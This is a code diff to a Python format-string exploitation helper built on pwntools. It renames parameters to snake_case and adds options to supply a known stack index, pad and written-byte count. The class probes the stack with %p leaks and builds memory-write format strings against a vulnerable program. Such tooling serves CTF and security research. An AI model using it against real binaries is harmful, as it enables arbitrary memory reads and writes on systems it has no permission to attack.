@@ -15,10 +15,18 @@ class FormatString:
         Is this binary little or big endian?
     elf : pwnlib.elf.elf.ELF, optional
         pwnlib elf instantiation of this binary. If specified, all fields will be taken from this class.
-    maxExplore : int, optional
+    max_explore : int, optional
         How deep down the stack should we explore? Larger numbers may take more time. Default is 64.
-    badChars : str, optional
+    bad_chars : str, optional
         What characters should we avoid when exploiting this? Defaults to newline character.
+    index : int, optional
+        If you already know the index for this vulnerability, you can specify it here
+    pad : int, optional
+        If you already know the padding needed, you can specify it here
+    written : int, optional
+        If you already know how many bytes have been written in the format string, you can specify it here
+    explore_stack : bool, optional
+        Should we auto-explore the stack? Defaults to True.
     
     
     Returns 
@@ -38,14 +46,15 @@ class FormatString:
         pwnlib ELF instantiation representing this binary
     exec_fmt : function
         Function to be called when we need to evaluate a format string
-    maxExplore : int
+    max_explore : int
         How deep down the stack should we explore?
-    badChars : str
+    bad_chars : str
         What characters should we avoid when exploiting this?
 
     """
     
-    def __init__(self,exec_fmt,arch='i386',bits=32,endian='little',elf=None,maxExplore=64,badChars="\n"):
+    def __init__(self,exec_fmt,arch='i386',bits=32,endian='little',elf=None,max_explore=64,bad_chars="\n",
+                 index=None,pad=None,written=None,explore_stack=True):
 
         if type(exec_fmt) is not type(lambda x: x):
             log.error("exec_fmt arg must be a callable function.")
@@ -56,16 +65,16 @@ class FormatString:
         self.endian = endian
         self.elf = elf
         self.exec_fmt = exec_fmt
-        self.maxExplore = maxExplore
-        self.badChars = badChars
+        self.max_explore = max_explore
+        self.bad_chars = bad_chars
 
         # Might want to change this sometime...
         self.padChar = "C"
         
         # Where is our controlled buffer?
-        self.pad = None
-        self.index = None
-        self.alreadyWritten = None
+        self.pad = pad
+        self.index = index
+        self.already_written = written
 
         # Recording what's already on the stack
         self.stack = [0]
@@ -82,11 +91,19 @@ class FormatString:
 
         self.leak = memleak.MemLeak(self._leak)
         
-        # Try to determine where we are in the binary
-        self._findIndex()
+        # Skip the index find if we have been given it
+        if self.index != None:
+            # If no pad specified, default to 0
+            if self.pad == None:
+                log.warn("Index specified but no pad specified. Defaulting to 0.")
+                self.pad = 0
+        
+        else:
+            # Try to determine where we are in the binary
+            self._findIndex()
 
-        # explore the stack
-        self._exploreStack()
+        if explore_stack:
+            self._exploreStack()
 
     def _intToStr(self,i):
         """Converts integer to it's corresponding ASCII string representation"""
@@ -199,7 +216,7 @@ class FormatString:
         pad = self.pad or 0
 
         # Loop through and record the values
-        for i in range(1,self.maxExplore):
+        for i in range(1,self.max_explore):
             s = "{2}{0}%{1}$p{0}".format("J"*wordSize,i,"C"*pad)
             out = self.exec_fmt(s)
             out = out[out.index("J"*wordSize)+wordSize:]
@@ -240,7 +257,7 @@ class FormatString:
         padChar = self.padChar
 
         # Loop through up to the max exploration depth
-        for index in range(1,self.maxExplore):
+        for index in range(1,self.max_explore):
 
             # Check for pad offset
             for pad in range(wordSize):
@@ -250,7 +267,7 @@ class FormatString:
 
                 # If this is the base print, lets find the number of bytes written before us
                 if index == 1 and pad == 0:
-                    self.alreadyWritten = len(output.split(testInput)[0])
+                    self.already_written = len(output.split(testInput)[0])
 
                 # Check if we found it
                 if unhexlify(outputHex)[::-1] == testInput:
@@ -357,7 +374,7 @@ class FormatString:
     def _hasBadChar(self,s):
         """Check input for bad characters.
 
-        Given the badChars we initialized the class with, check the input variable to see if any exist in there.
+        Given the bad_chars we initialized the class with, check the input variable to see if any exist in there.
 
         Parameters
         ----------
@@ -384,7 +401,7 @@ class FormatString:
             s = unhexlify(h)
 
         # Check for chars we don't like
-        for badChar in self.badChars:
+        for badChar in self.bad_chars:
             if badChar in s:
                 return True
 
@@ -474,10 +491,10 @@ class FormatString:
 
         # Print out appropriate number of chars
         fmt = ""
-        if val - self.pad - self.alreadyWritten > 0:
-            fmt += "%{0}c".format(str(val-self.pad-self.alreadyWritten))
+        if val - self.pad - self.already_written > 0:
+            fmt += "%{0}c".format(str(val-self.pad-self.already_written))
         
-        elif val - self.pad - self.alreadyWritten < 0:
+        elif val - self.pad - self.already_written < 0:
             log.error("Pad value is larger than print value. Pick a larger value to write.")
             return None
 
@@ -577,7 +594,7 @@ class FormatString:
 
         # TODO: Assuming pad of 0. Need to implement heuristic to guess a better pad.
         pad = self.pad or 0
-        alreadyWritten = self.alreadyWritten or 0
+        already_written = self.already_written or 0
 
         # TODO: This is kinda #YOLO... Need to better handle the case where we're going into the blind from the get go..
         index = self.index or 1
@@ -605,7 +622,7 @@ class FormatString:
         fmt = ""
 
         # For each value we need to write, add it on to the format string
-        cumulative = alreadyWritten + pad
+        cumulative = already_written + pad
 
         for write in writes:
 
